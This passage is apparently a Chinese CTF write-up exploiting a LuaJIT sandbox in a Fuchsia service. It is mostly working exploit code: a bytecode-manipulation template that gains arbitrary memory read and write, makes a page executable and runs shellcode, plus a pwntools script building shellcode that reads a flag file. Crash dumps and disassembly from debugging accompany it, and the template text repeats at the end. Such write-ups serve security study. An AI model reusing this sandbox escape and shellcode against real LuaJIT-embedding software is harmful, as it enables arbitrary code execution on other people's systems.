虽然没有调试器,但是在fuchsia内如果触发了setfault是会有dump信息显示在fuchsia boot console里的,这也是为什么我们具有没有调试器也可以把exp调出来的可能。
__int64 __fastcall sub_32E50(int64_t *a1, __int64 a2, unsigned int a3)
__int64 v3; // r13
unsigned int v4; // er12
__int64 result; // rax
v3 = a2;
v4 = a3;
if ( a3 == 1 )
v3 = a2 - (a1[2] - a1[1]);
if ( a1[5] > (unsigned __int64)a1[7] )
((void (__fastcall *)(int64_t *, _QWORD, _QWORD))a1[9])(a1, 0LL, 0LL); // <-- 第一次
if ( !a1[5] )
return 0xFFFFFFFFLL;
a1[4] = 0LL;
a1[7] = 0LL;
a1[5] = 0LL;
if ( ((__int64 (__fastcall *)(int64_t *, __int64, _QWORD))a1[10])(a1, v3, v4) < 0 ) // <-- 第二次
return 0xFFFFFFFFLL;
*(_DWORD *)a1 &= 0xFFFFFFEF;
result = 0LL;
a1[2] = 0LL;
a1[1] = 0LL;
return result;
create.tpl.lua (生成用于loadstring的字节码,我进行了hex encode,留出shellcode的部分)
-- The following function serves as the template for evil.lua.
-- The general outline is to compile this function as-written, dump
-- it to bytecode, manipulate the bytecode a bit, and then save the
-- result as evil.lua.
local evil = function(v)
-- This is the x86_64 native code which we'll execute. It
-- is a very benign payload which just prints "Hello World"
-- and then fixes up some broken state.
local shellcode =
-- The dirty work is done by the following "inner" function.
-- This inner function exists because we require a vararg call
-- frame on the Lua stack, and for the function associated with
-- said frame to have certain special upvalues.
local function inner(...)
if false then
-- The following three lines turn into three bytecode
-- instructions. We munge the bytecode slightly, and then
-- later reinterpret the instructions as a cdata object,
-- which will end up being `cdata<const char *>: NULL`.
-- The `if false` wrapper ensures that the munged bytecode
-- isn't executed.
local cdata = -32749
cdata = 0
cdata = 0
-- Through the power of bytecode manipulation, the
-- following three functions will become (the fast paths of)
-- string.byte, string.char, and string.sub. This is
-- possible because LuaJIT has bytecode instructions
-- corresponding to the fast paths of said functions. Note
-- that we musn't stray from the fast path (because the
-- fallback C code won't be wired up). Also note that the
-- interpreter state will be slightly messed up after
-- calling one of these functions.
local function s_byte(s) end
local function s_char(i, _) end
local function s_sub(s, i, j) end
-- The following function does nothing, but calling it will
-- restore the interpreter state which was messed up following
-- a call to one of the previous three functions. Because this
-- function contains a cdata literal, loading it from bytecode
-- will result in the ffi library being initialised (but not
-- registered in the global namespace).
local function resync() return 0LL end
-- Helper function to reinterpret the first four bytes of a
-- string as a uint32_t, and return said value as a number.
local function s_uint32(s)
local result = 0
for i = 4, 1, -1 do
result = result * 256 + s_byte(s_sub(s, i, i))
return result
-- The following line obtains the address of the GCfuncL
-- object corresponding to "inner". As written, it just fetches
-- the 0th upvalue, and does some arithmetic. After some
-- bytecode manipulation, the 0th upvalue ends up pointing
-- somewhere very interesting: the frame info TValue containing
-- func|FRAME_VARG|delta. Because delta is small, this TValue
-- will end up being a denormalised number, from which we can
-- easily pull out 32 bits to give us the "func" part.
local iaddr = (inner * 2^1022 * 2^52) % 2^32
-- The following five lines read the "pc" field of the GCfuncL
-- we just obtained. This is done by creating a GCstr object
-- overlaying the GCfuncL, and then pulling some bytes out of
-- the string. Bytecode manipulation results in a nice KPRI
-- instruction which preserves the low 32 bits of the istr
-- TValue while changing the high 32 bits to specify that the
-- low 32 bits contain a GCstr*.
local istr = (iaddr - 4) + 2^52
istr = -32764 -- Turned into KPRI(str)
local pc = s_sub(istr, 5, 8)
istr = resync()
pc = s_uint32(pc)
-- The following three lines result in the local variable
-- called "memory" being `cdata<const char *>: NULL`. We can
-- subsequently use this variable to read arbitrary memory
-- (one byte at a time). Note again the KPRI trick to change
-- the high 32 bits of a TValue. In this case, the low 32 bits
-- end up pointing to the bytecode instructions at the top of
-- this function wrapped in `if false`.
local memory = (pc + 8) + 2^52
memory = -32758 -- Turned into KPRI(cdata)
memory = memory + 0
-- Helper function to read a uint32_t from any memory location.
local function m_uint32(offs)
local result = 0
for i = offs + 3, offs, -1 do
result = result * 256 + (memory[i] % 256)
return result
local function m_uint64(offs)
local result = 0
for i = offs + 7, offs, -1 do
result = result * 256 + (memory[i] % 256)
return result
-- Helper function to extract the low 32 bits of a TValue.
-- In particular, for TValues containing a GCobj*, this gives
-- the GCobj* as a uint32_t. Note that the two memory reads
-- here are GCfuncL::uvptr[1] and GCupval::v.
local vaddr = m_uint32(m_uint32(iaddr + 24) + 16)
local function low32(tv)
v = tv
res = m_uint32(vaddr)
return res
-- Helper function which is the inverse of s_uint32: given a
-- 32 bit number, returns a four byte string.
local function ub4(n)
local result = ""
for i = 0, 3 do
local b = n % 256
n = (n - b) / 256
result = result .. s_char(b)
return result
local function ub8(n)
local result = ""
for i = 0, 7 do
local b = n % 256
n = (n - b) / 256
result = result .. s_char(b)
return result
local function hexdump_print(addr, len)
local result = ''
for i = 0, len - 1 do
if i % 16 == 0 and i ~= 0 then
result = result .. '\n'
result = result .. string.format('%02x', memory[addr + i] % 0x100) .. ' '
local function hexdump_tv(tv)
v = tv
hexdump_print(vaddr, 8)
local text_base = m_uint64(low32("") - 4 + 0x80) - 0x29090
--print('got text_base @ 0x' .. string.format('%x', text_base))
local strlen_got = text_base + 0x74058
local strlen_addr = m_uint64(strlen_got)
--print('strlen got @ 0x' .. string.format('%x', strlen_addr))
local ld_so_base = strlen_addr - 0x59e80
--print('ld_so base @ 0x' .. string.format('%x', ld_so_base))
local nop4k = "\144"
for i = 1, 12 do nop4k = nop4k .. nop4k end
local ashellcode = nop4k .. shellcode .. nop4k
local asaddr = low32(ashellcode) + 16
asaddr = asaddr + 2^12 - (asaddr % 2^12)
-- arbitrary (32 bits range) write
-- form file structure according to function requirements
local rdi = 0x10000378 -- State <-- fixed?!
--local mctab_s = "\0\0\0\0\99\4\0\0".. ub4(rdi)
-- .."\0\0\0\0\0\0\0\0\255\255\0\0\255\255\255\255"
-- move this before arbitrary write
-- seems this will interfere, because the State has been
-- manipulated after arbitrary write
local fshellcode = ub4(low32("") + 132) .."\0\0\0\0"..
ub8(ld_so_base + 0x32e50)
fshellcode = -32760 -- Turned into KPRI(func)
local mctab_s = "\0\0\0\0\99\4\0\0".. ub4(rdi)
local mctab = low32(mctab_s) + 16 + 2^52
mctab = -32757 -- Turned into KPRI(table)
mctab[5] = 0x1 / 2^52 / 2^1022
mctab[7] = 0 / 2^52 / 2^1022 -- qword ptr [$rdi + 40] > qword ptr [$rdi + 56]
mctab[9] = (text_base + 0x56ca0) / 2^52 / 2^1022
--mctab[9] = 0x2200 / 2^52 / 2^1022
mctab[306] = 0x10008000 / 2^52 / 2^1022
mctab[309] = 0x10000 / 2^52 / 2^1022
mctab[10] = asaddr / 2^52 / 2^1022
--mctab[10] = 0xdeadbeef / 2^52 / 2^1022
-- The following seven lines result in the memory protection of
-- the page at asaddr changing from read/write to read/execute.
-- This is done by setting the jit_State::mcarea and szmcarea
-- fields to specify the page in question, setting the mctop and
-- mcbot fields to an empty subrange of said page, and then
-- triggering some JIT compilation. As a somewhat unfortunate
-- side-effect, the page at asaddr is added to the jit_State's
-- linked-list of mcode areas (the shellcode unlinks it).
local mcarea = mctab[1]
val = asaddr / 2^52 / 2^1022
mctab[4] = 2^12 / 2^52 / 2^1022
local wtf = low32("") + 2748
mctab[3] = val
mctab[2] = val
mctab[1] = val
mctab[0] = val
hexdump_print(wtf, 32 + 32)
local i = 0
while i < 0x1000 do i = i + 1 end
-- The following three lines construct a GCfuncC object
-- whose lua_CFunction field is set to asaddr. A fixed
-- offset from the address of the empty string gives us
-- the global_State::bc_cfunc_int field.
--local fshellcode = ub4(low32("") + 132) .."\0\0\0\0"..
-- ub4(asaddr) .."\0\0\0\0"
-- Some helpers for manipulating bytecode:
local ffi = require "ffi"
local bit = require "bit"
local BC = {KSHORT = 41, KPRI = 43}
-- Dump the as-written evil function to bytecode:
local estr = string.dump(evil, true)
local buf = ffi.new("uint8_t[?]", #estr+1, estr)
local p = buf + 5
-- Helper function to read a ULEB128 from p:
local function read_uleb128()
local v = p[0]; p = p + 1
if v >= 128 then
local sh = 7; v = v - 128
local r = p[0]
v = v + bit.lshift(bit.band(r, 127), sh)
sh = sh + 7
p = p + 1
until r < 128
return v
-- The dumped bytecode contains several prototypes: one for "evil"
-- itself, and one for every (transitive) inner function. We step
-- through each prototype in turn, and tweak some of them.
while true do
local len = read_uleb128()
if len == 0 then break end
local pend = p + len
local flags, numparams, framesize, sizeuv = p[0], p[1], p[2], p[3]
p = p + 4
local sizebc = read_uleb128()
local bc = p
local uv = ffi.cast("uint16_t*", p + sizebc * 4)
if numparams == 0 and sizeuv == 3 then
-- This branch picks out the "inner" function.
-- The first thing we do is change what the 0th upvalue
-- points at:
uv[0] = uv[0] + 2
-- Then we go through and change everything which was written
-- as "local_variable = -327XX" in the source to instead be
-- a KPRI instruction:
for i = 0, sizebc do
if bc[0] == BC.KSHORT then
local rd = ffi.cast("int16_t*", bc)[1]
if rd <= -32749 then
bc[0] = BC.KPRI
bc[3] = 0
if rd == -32749 then
-- the `cdata = -32749` line in source also tweaks
-- the two instructions after it:
bc[4] = 0
bc[8] = 0
bc = bc + 4
elseif sizebc == 1 then
-- As written, the s_byte, s_char, and s_sub functions each
-- contain a single "return" instruction. We replace said
-- instruction with the corresponding fast-function instruction.
bc[0] = 147 + numparams
bc[2] = bit.band(1 + numparams, 6)
p = pend
function string.fromhex(str)
return (str:gsub('..', function (cc)
return string.char(tonumber(cc, 16))
function string.tohex(str)
return (str:gsub('.', function (c)
return string.format('%02X', string.byte(c))
res = string.tohex(ffi.string(buf, #estr))
local f = io.open("../shellcode.hex", "wb")
f:write(ffi.string(res, #res))
a = loadstring(string.fromhex(res))
-- Finally, save the manipulated bytecode as evil.lua:
gen_shellcode.py (填入最后执行的shellcode)
from pwn import *
context(arch='amd64', os='linux')
shellcode = r'''
sub rsi, 0x2710
mov rax, rsi
mov rbp, rax
add rax, 0x73370
mov rdi, %s
push rdi
mov rdi, %s
push rdi
mov rdi, rsp
push 0
push 114
mov rsi, rsp
call rax
mov rcx, rax
mov rdi, rsp
mov rsi, 100
mov rdx, 100
mov rax, rbp
add rax, 0x733c0
call rax
mov rdi, 1
mov rsi, rsp
mov rdx, 100
mov rax, rbp
add rax, 0x73510
call rax
push 0
shellcode = shellcode % (u64('a/flag'.ljust(8, '\x00')), u64('/pkg/dat'))
with open('create.tpl.lua', 'r') as f:
content = f.read()
shellcode_hex = repr(asm(shellcode))
content = content.replace('{SHELLCODE_TPL}', shellcode_hex)
with open('create.lua', 'w') as f:
script.lua (实际传入response的lua代码,留出字节码hex部分)
function string.fromhex(str)
return (str:gsub('..', function (cc)
return string.char(tonumber(cc, 16))
function string.tohex(str)
return (str:gsub('.', function (c)
return string.format('%02X', string.byte(c))
shellcode = '{}'
function fdb0cdf28c53764e()
x = loadstring(string.fromhex(shellcode))
return tostring(x())
python2 gen_shellcode.py
python2 request.py
[DEBUG] Received 0x1c0 bytes:
'<title>Error response</title>\n'
'<h1>Error response</h1>\n'
'<p>Error code 400.\n'
"<p>Message: Bad request syntax ('rwctf{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}\\x04\\x00\\x10\\x00\\x00\\x00\\x00\\xb8\\x03\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\xcf\\x90J\\xa8.\\x00\\x00x\\x03\\x00\\x10\\x00\\x00\\x00\\x00\\x87A\\\\]\\xd3\\x1a\\x00\\x00H\\x94\\x00\\x10\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00').\n"
'<p>Error code explanation: 400 = Bad request syntax or unsupported method.\n'
[40698.170] 01045.01203> devmgr: crash_analyzer_listener: analyzing exception type 0x108
[40698.171] 01105.01119> <== fatal exception: process /pkg/bin/frawler[162600] thread initial-thread[162612]
[40698.171] 01105.01119> <== fatal page fault, PC at 0x7a8af11e4b20
[40698.171] 01105.01119> CS: 0 RIP: 0x7a8af11e4b20 EFL: 0x246 CR2: 0x8000
[40698.171] 01105.01119> RAX: 0x8000 RBX: 0 RCX: 0 RDX: 0
[40698.171] 01105.01119> RSI: 0 RDI: 0x5746f370eb58 RBP: 0x799649e95ca0 RSP: 0x799649e95c78
[40698.171] 01105.01119> R8: 0 R9: 0 R10: 0 R11: 0x206
[40698.171] 01105.01119> R12: 0x5746f370eb58 R13: 0x100003b8 R14: 0x5746f370eb58 R15: 0x1
[40698.171] 01105.01119> errc: 0x6
[40698.171] 01105.01119> bottom of user stack:
[40698.171] 01105.01119> 0x0000799649e95c78: f11e4acc 00007a8a 10000558 00000000 |.J...z..X.......|
[40698.171] 01105.01119> 0x0000799649e95c88: f370eed0 00005746 00008008 00000000 |..p.FW..........|
[40698.171] 01105.01119> 0x0000799649e95c98: 10000558 00000000 49e95cf0 00007996 |X........\.I.y..|
[40698.171] 01105.01119> 0x0000799649e95ca8: f11c7474 00007a8a a1ad8e1c 9b72fb15 |tt...z........r.|
[40698.171] 01105.01119> 0x0000799649e95cb8: f370eec8 00005746 10000558 00000000 |..p.FW..X.......|
[40698.172] 01105.01119> 0x0000799649e95cc8: 10000558 00000000 f1190868 00007a8a |X.......h....z..|
[40698.172] 01105.01119> 0x0000799649e95cd8: 100003b8 00000000 100003b8 00000000 |................|
[40698.172] 01105.01119> 0x0000799649e95ce8: 10000378 00000000 49e95d30 00007996 |x.......0].I.y..|
[40698.172] 01105.01119> 0x0000799649e95cf8: f11c5e0d 00007a8a 1000d0b8 00000000 |.^...z..........|
[40698.172] 01105.01119> 0x0000799649e95d08: 10000558 00000000 00000018 00000000 |X...............|
[40698.172] 01105.01119> 0x0000799649e95d18: 100003b8 00000000 10000fa8 00000000 |................|
[40698.172] 01105.01119> 0x0000799649e95d28: 49e95e00 00007996 10000378 00000000 |.^.I.y..x.......|
[40698.172] 01105.01119> 0x0000799649e95d38: f11ff4f6 00007a8a 10000fa8 00000000 |.....z..........|
[40698.172] 01105.01119> 0x0000799649e95d48: 49e95e00 00007996 fffffee0 00000000 |.^.I.y..........|
[40698.172] 01105.01119> 0x0000799649e95d58: 10000378 10000378 49e95e00 00007996 |x...x....^.I.y..|
[40698.172] 01105.01119> 0x0000799649e95d68: 10000378 00000000 1000d278 00000000 |x.......x.......|
[40698.172] 01105.01119> arch: x86_64
[40698.184] 01105.01119> dso: id=333103e7c266dfce base=0x7a8af118e000 name=app:/pkg/bin/frawler
[40698.184] 01105.01119> dso: id=8f51b7868dd0d5b9aefede5739518f97f2a580e0 base=0x58f25e8e0000 name=libc.so
[40698.184] 01105.01119> dso: id=89d4eb99573947ac792dd4a5e9e498bd44b4eefe base=0x554a3ca5d000 name=<vDSO>
[40698.184] 01105.01119> dso: id=fa0cdaa5591d31e3 base=0x2f6fae109000 name=libc++.so.2
[40698.184] 01105.01119> dso: id=86f83b6141c863ad base=0x2d3787750000 name=libunwind.so.1
[40698.184] 01105.01119> dso: id=4b87e913774eb02cb107ae0f1385ddfcb877ba2e base=0xe98beb70000 name=libfdio.so
[40698.184] 01105.01119> dso: id=ecfc9b0e3f0ca03b base=0xaef30a38000 name=libclang_rt.scudo.so
[40698.184] 01105.01119> dso: id=1b59f762cf98d972 base=0x85aca3d3000 name=libc++abi.so.1
[40698.184] 01105.01119> {{{reset}}}
[40698.185] 01105.01119> {{{module:0x21fb5444:<VMO#162635=libc++abi.so.1>:elf:1b59f762cf98d972}}}
[40698.185] 01105.01119> {{{mmap:0x85aca3d3000:0x16000:load:0x21fb5444:r:0}}}
[40698.185] 01105.01119> {{{mmap:0x85aca3e9000:0x24000:load:0x21fb5444:rx:0x16000}}}
[40698.185] 01105.01119> {{{mmap:0x85aca40d000:0x5000:load:0x21fb5444:rw:0x3a000}}}
[40698.185] 01105.01119> {{{module:0x21fb5445:<VMO#162620=libclang_rt.scudo.s:elf:ecfc9b0e3f0ca03b}}}
[40698.185] 01105.01119> {{{mmap:0xaef30a38000:0x8000:load:0x21fb5445:r:0}}}
[40698.185] 01105.01119> {{{mmap:0xaef30a40000:0xa000:load:0x21fb5445:rx:0x8000}}}
[40698.192] 01105.01119> {{{mmap:0xaef30a4a000:0x4000:load:0x21fb5445:rw:0x12000}}}
[40698.192] 01105.01119> {{{module:0x21fb5446:<VMO#162625=libfdio.so>:elf:4b87e913774eb02cb107ae0f1385ddfcb877ba2e}}}
[40698.192] 01105.01119> {{{mmap:0xe98beb70000:0x22000:load:0x21fb5446:rx:0}}}
[40698.192] 01105.01119> {{{mmap:0xe98beb93000:0x4000:load:0x21fb5446:rw:0x23000}}}
[40698.192] 01105.01119> {{{module:0x21fb5447:<VMO#162640=libunwind.so.1>:elf:86f83b6141c863ad}}}
[40698.192] 01105.01119> {{{mmap:0x2d3787750000:0x6000:load:0x21fb5447:r:0}}}
[40698.192] 01105.01119> {{{mmap:0x2d3787756000:0x8000:load:0x21fb5447:rx:0x6000}}}
[40698.192] 01105.01119> {{{mmap:0x2d378775e000:0x3000:load:0x21fb5447:rw:0xe000}}}
[40698.192] 01105.01119> {{{module:0x21fb5448:<VMO#162630=libc++.so.2>:elf:fa0cdaa5591d31e3}}}
[40698.192] 01105.01119> {{{mmap:0x2f6fae109000:0x52000:load:0x21fb5448:r:0}}}
[40698.192] 01105.01119> {{{mmap:0x2f6fae15b000:0x77000:load:0x21fb5448:rx:0x52000}}}
[40698.192] 01105.01119> {{{mmap:0x2f6fae1d2000:0x9000:load:0x21fb5448:rw:0xc9000}}}
[40698.192] 01105.01119> {{{module:0x21fb5449:<VMO#1033=vdso/full>:elf:89d4eb99573947ac792dd4a5e9e498bd44b4eefe}}}
[40698.192] 01105.01119> {{{mmap:0x554a3ca5d000:0x7000:load:0x21fb5449:r:0}}}
[40698.192] 01105.01119> {{{mmap:0x554a3ca64000:0x1000:load:0x21fb5449:rx:0x7000}}}
[40698.192] 01105.01119> {{{module:0x21fb544a:<VMO#162604=ld.so.1>:elf:8f51b7868dd0d5b9aefede5739518f97f2a580e0}}}
[40698.192] 01105.01119> {{{mmap:0x58f25e8e0000:0xcb000:load:0x21fb544a:rx:0}}}
[40698.192] 01105.01119> {{{mmap:0x58f25e9ac000:0x6000:load:0x21fb544a:rw:0xcc000}}}
[40698.192] 01105.01119> {{{module:0x21fb544b:<VMO#162591=/pkg/bin/frawler>:elf:333103e7c266dfce}}}
[40698.192] 01105.01119> {{{mmap:0x7a8af118e000:0x1d000:load:0x21fb544b:r:0}}}
[40698.192] 01105.01119> {{{mmap:0x7a8af11ab000:0x57000:load:0x21fb544b:rx:0x1d000}}}
[40698.192] 01105.01119> {{{mmap:0x7a8af1202000:0x4000:load:0x21fb544b:rw:0x74000}}}
[40698.196] 01105.01119> bt#01: pc 0x7a8af11e4b20 sp 0x799649e95c78 (app:/pkg/bin/frawler,0x56b20)
[40698.196] 01105.01119> bt#02: pc 0x7a8af11e4acc sp 0x799649e95c80 (app:/pkg/bin/frawler,0x56acc)
[40698.197] 01105.01119> bt#03: pc 0x7a8af11c7474 sp 0x799649e95cb0 (app:/pkg/bin/frawler,0x39474)
[40698.198] 01105.01119> bt#04: pc 0x7a8af11c5e0d sp 0x799649e95d00 (app:/pkg/bin/frawler,0x37e0d)
[40698.198] 01105.01119> bt#05: pc 0x7a8af11ff4f6 sp 0x799649e95d40 (app:/pkg/bin/frawler,0x714f6)
[40698.205] 01105.01119> bt#06: pc 0x7a8af11b0547 sp 0x799649e95d90 (app:/pkg/bin/frawler,0x22547)
[40698.209] 01105.01119> bt#07: pc 0x7a8af11b03a5 sp 0x799649e95db0 (app:/pkg/bin/frawler,0x223a5)
[40698.209] 01105.01119> bt#08: pc 0x7a8af1200af1 sp 0x799649e95e00 (app:/pkg/bin/frawler,0x72af1)
[40698.210] 01105.01119> bt#09: pc 0x7a8af11b3218 sp 0x799649e95e50 (app:/pkg/bin/frawler,0x25218)
[40698.210] 01105.01119> bt#10: pc 0x7a8af11f9f49 sp 0x799649e95e90 (app:/pkg/bin/frawler,0x6bf49)
[40698.211] 01105.01119> bt#11: pc 0x7a8af11fa0c6 sp 0x799649e95ec0 (app:/pkg/bin/frawler,0x6c0c6)
[40698.211] 01105.01119> bt#12: pc 0x7a8af11fa270 sp 0x799649e95f10 (app:/pkg/bin/frawler,0x6c270)
[40698.211] 01105.01119> bt#13: pc 0x58f25e8f9c48 sp 0x799649e95f60 (libc.so,0x19c48)
[40698.215] 01105.01119> bt#14: pc 0 sp 0x799649e96000
[40698.215] 01105.01119> bt#15: end
[40698.218] 01105.01119> {{{bt:1:0x7a8af11e4b20}}}
[40698.222] 01105.01119> {{{bt:2:0x7a8af11e4acc}}}
[40698.222] 01105.01119> {{{bt:3:0x7a8af11c7474}}}
[40698.223] 01105.01119> {{{bt:4:0x7a8af11c5e0d}}}
[40698.223] 01105.01119> {{{bt:5:0x7a8af11ff4f6}}}
[40698.224] 01105.01119> {{{bt:6:0x7a8af11b0547}}}
[40698.224] 01105.01119> {{{bt:7:0x7a8af11b03a5}}}
[40698.224] 01105.01119> {{{bt:8:0x7a8af1200af1}}}
[40698.226] 01105.01119> {{{bt:9:0x7a8af11b3218}}}
[40698.226] 01105.01119> {{{bt:10:0x7a8af11f9f49}}}
[40698.227] 01105.01119> {{{bt:11:0x7a8af11fa0c6}}}
[40698.227] 01105.01119> {{{bt:12:0x7a8af11fa270}}}
[40698.228] 01105.01119> {{{bt:13:0x58f25e8f9c48}}}
[40698.229] 01105.01119> {{{bt:14:0}}}
LOAD:0000000000056B1B mov ecx, esi
LOAD:0000000000056B1D shl ecx, 5
LOAD:0000000000056B20 mov byte ptr [rax], 6Ah ; 'j'
LOAD:0000000000056B23 mov [rax+1], cl
LOAD:0000000000056B26 mov r9d, esi
LOAD:0000000000056B29 and r9d, 7
/* Generate an exit stub group at the bottom of the reserved MCode memory. */
static MCode *asm_exitstub_gen(ASMState *as, ExitNo group)
ExitNo i, groupofs = (group*EXITSTUBS_PER_GROUP) & 0xff;
MCode *mxp = as->mcbot;
MCode *mxpstart = mxp;
if (mxp + (2+2)*EXITSTUBS_PER_GROUP+8+5 >= as->mctop)
/* Push low byte of exitno for each exit stub. */
*mxp++ = XI_PUSHi8; *mxp++ = (MCode)groupofs; // 应该是这里死了
for (i = 1; i < EXITSTUBS_PER_GROUP; i++) {
*mxp++ = XI_JMPs; *mxp++ = (MCode)((2+2)*(EXITSTUBS_PER_GROUP - i) - 2);
*mxp++ = XI_PUSHi8; *mxp++ = (MCode)(groupofs + i);
/* Push the high byte of the exitno for each exit stub group. */
*mxp++ = XI_PUSHi8; *mxp++ = (MCode)((group*EXITSTUBS_PER_GROUP)>>8);
/* Store DISPATCH at original stack slot 0. Account for the two push ops. */
*mxp++ = XI_MOVmi;
*mxp++ = MODRM(XM_OFS8, 0, RID_ESP);
*mxp++ = 2*sizeof(void *);
*(int32_t *)mxp = ptr2addr(J2GG(as->J)->dispatch); mxp += 4;
/* Jump to exit handler which fills in the ExitState. */
*mxp++ = XI_JMP; mxp += 4;
*((int32_t *)(mxp-4)) = jmprel(mxp, (MCode *)(void *)lj_vm_exit_handler);
/* Commit the code for this group (even if assembly fails later on). */
lj_mcode_commitbot(as->J, mxp);
as->mcbot = mxp;
as->mclim = as->mcbot + MCLIM_REDZONE;
return mxpstart;
mcprot = 0x0,
mcarea = 0x1234 <error: Cannot access memory at address 0x1234>,
mctop = 0x4321 <error: Cannot access memory at address 0x4321>,
mcbot = 0xdead <error: Cannot access memory at address 0xdead>,
szmcarea = 0xbeef,
szallmcarea = 0x1000,
local mcarea = mctab[1]
mctab[0] = 0x1234/ 2^52 / 2^1022
mctab[1] = 0x4321/ 2^52 / 2^1022
mctab[2] = 0xdead / 2^52 / 2^1022
mctab[3] = asaddr / 2^52 / 2^1022
mctab[4] = 2^12 / 2^52 / 2^1022
--while mctab[0] == 0 do end
local i = 1
while i < 0x1000000 do
i = i + 1
__int64 __fastcall lj_mcode_free(__int64 a1)
__int64 result; // rax
_QWORD *v2; // rdi
_QWORD *v3; // rbx
result = a1;
v2 = *(_QWORD **)(a1 + 2448);
*(_QWORD *)(result + 2448) = 0LL;
*(_QWORD *)(result + 2480) = 0LL;
if ( v2 )
v3 = (_QWORD *)*v2;
result = mcode_free(v2, v2[1]);
v2 = v3;
while ( v3 );
return result;
LOAD:000000000002BD70 loc_2BD70:
LOAD:000000000002BD70 mov rbx, [rdi] <-- 崩溃,rdi = 0x4321
LOAD:000000000002BD73 mov rsi, [rdi+8]
LOAD:000000000002BD77 call mcode_free
LOAD:000000000002BD7C mov rdi, rbx
LOAD:000000000002BD7F test rbx, rbx
LOAD:000000000002BD82 jnz short loc_2BD70
/* Free all MCode areas. */
void lj_mcode_free(jit_State *J)
MCode *mc = J->mcarea;
J->mcarea = NULL;
J->szallmcarea = 0;
while (mc) {
MCode *next = ((MCLink *)mc)->next;
mcode_free(J, mc, ((MCLink *)mc)->size);
mc = next;
static void mcode_free(jit_State *J, void *p, size_t sz)
VirtualFree(p, 0, MEM_RELEASE);
gef➤ p (uint64_t)(&((GG_State*)0x40000378).J.mcarea)-(uint64_t)(&((GG_State*)0x40000378).J)
$7 = 0x988
>>> 0x988
[49833.577] 01105.01119> <== general fault, PC at 0x50c8d6669d70
[49833.577] 01105.01119> CS: 0 RIP: 0x50c8d6669d70 EFL: 0x286 CR2: 0
[49833.577] 01105.01119> RAX: 0xffffffff RBX: 0x9090909090909090 RCX: 0x7e0029445a42 RDX: 0
[49833.577] 01105.01119> RSI: 0 RDI: 0x9090909090909090 RBP: 0x9b703aacc60 RSP: 0x9b703aacc50
[49833.577] 01105.01119> R8: 0 R9: 0 R10: 0 R11: 0x206
[49833.577] 01105.01119> R12: 0x10000558 R13: 0x100003b8 R14:
[49833.593] 01105.01119> bt#01: pc 0x50c8d6669d70 sp 0x9b703aacc50 (app:/pkg/bin/frawler,0x2bd70)
[49833.593] 01105.01119> bt#02: pc 0x50c8d66600d4 sp 0x9b703aacc70 (app:/pkg/bin/frawler,0x220d4)
[49833.594] 01105.01119> bt#03: pc 0x50c8d6677b81 sp 0x9b703aaccb0 (app:/pkg/bin/frawler,0x39b81)
LOAD:00000000000220A1 loc_220A1:
LOAD:00000000000220A1 mov word ptr [r13+1F0h], 0
LOAD:00000000000220AB mov dword ptr [r13+2E0h], 0
LOAD:00000000000220B6 lea rdi, [r13+870h] ; s
LOAD:00000000000220BD xor r14d, r14d
LOAD:00000000000220C0 mov edx, 200h ; n
LOAD:00000000000220C5 xor esi, esi ; c
LOAD:00000000000220C7 call _memset
LOAD:00000000000220CC mov rdi, r12 ; <-- r12是没有用到的,但是是作为了`lj_mcode_free` 的参数
LOAD:00000000000220CF call lj_mcode_free ; <-- 调用到了这里崩溃
LOAD:00000000000220D4 mov rdi, r12
LOAD:00000000000220D7 call sub_2BD90
local mcarea = mctab[1]
mctab[0] = 0
mctab[1] = asaddr / 2^52 / 2^1022
mctab[2] = mctab[1]
mctab[3] = mctab[1]
mctab[4] = 2^12 / 2^52 / 2^1022
hexdump_print(0x10000558 + 2440, 0x30) -- 注意这里查看量太大会触发jit,所以不能太大
while mctab[0] == 0 do end
'00 00 00 00 00 00 00 00 00 50 01 10 00 00 00 00 \n'
'00 50 01 10 00 00 00 00 00 50 01 10 00 00 00 00 \n'
'00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n'
LOAD:000000000002BD70 loc_2BD70:
LOAD:000000000002BD70 mov rbx, [rdi]
LOAD:000000000002BD73 mov rsi, [rdi+8]
LOAD:000000000002BD77 call mcode_free
LOAD:000000000002BD7C mov rdi, rbx ; <-- 这里改动了rdi
LOAD:000000000002BD7F test rbx, rbx
LOAD:000000000002BD82 jnz short loc_2BD70
'90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 \n'
'90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 \n'
'90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 \n'
-- The following function serves as the template for evil.lua.
-- The general outline is to compile this function as-written, dump
-- it to bytecode, manipulate the bytecode a bit, and then save the
-- result as evil.lua.
local evil = function(v)
-- This is the x86_64 native code which we'll execute. It
-- is a very benign payload which just prints "Hello World"
-- and then fixes up some broken state.
local shellcode =
-- The dirty work is done by the following "inner" function.
-- This inner function exists because we require a vararg call
-- frame on the Lua stack, and for the function associated with
-- said frame to have certain special upvalues.
local function inner(...)
if false then
-- The following three lines turn into three bytecode
-- instructions. We munge the bytecode slightly, and then
-- later reinterpret the instructions as a cdata object,
-- which will end up being `cdata<const char *>: NULL`.
-- The `if false` wrapper ensures that the munged bytecode
-- isn't executed.
local cdata = -32749
cdata = 0
cdata = 0
-- Through the power of bytecode manipulation, the
-- following three functions will become (the fast paths of)
-- string.byte, string.char, and string.sub. This is
-- possible because LuaJIT has bytecode instructions
-- corresponding to the fast paths of said functions. Note
-- that we musn't stray from the fast path (because the
-- fallback C code won't be wired up). Also note that the
-- interpreter state will be slightly messed up after
-- calling one of these functions.
local function s_byte(s) end
local function s_char(i, _) end
local function s_sub(s, i, j) end
-- The following function does nothing, but calling it will
-- restore the interpreter state which was messed up following
-- a call to one of the previous three functions. Because this
-- function contains a cdata literal, loading it from bytecode
-- will result in the ffi library being initialised (but not
-- registered in the global namespace).
local function resync() return 0LL end
-- Helper function to reinterpret the first four bytes of a
-- string as a uint32_t, and return said value as a number.
local function s_uint32(s)
local result = 0
for i = 4, 1, -1 do
result = result * 256 + s_byte(s_sub(s, i, i))
return result
-- The following line obtains the address of the GCfuncL
-- object corresponding to "inner". As written, it just fetches
-- the 0th upvalue, and does some arithmetic. After some
-- bytecode manipulation, the 0th upvalue ends up pointing
-- somewhere very interesting: the frame info TValue containing
-- func|FRAME_VARG|delta. Because delta is small, this TValue
-- will end up being a denormalised number, from which we can
-- easily pull out 32 bits to give us the "func" part.
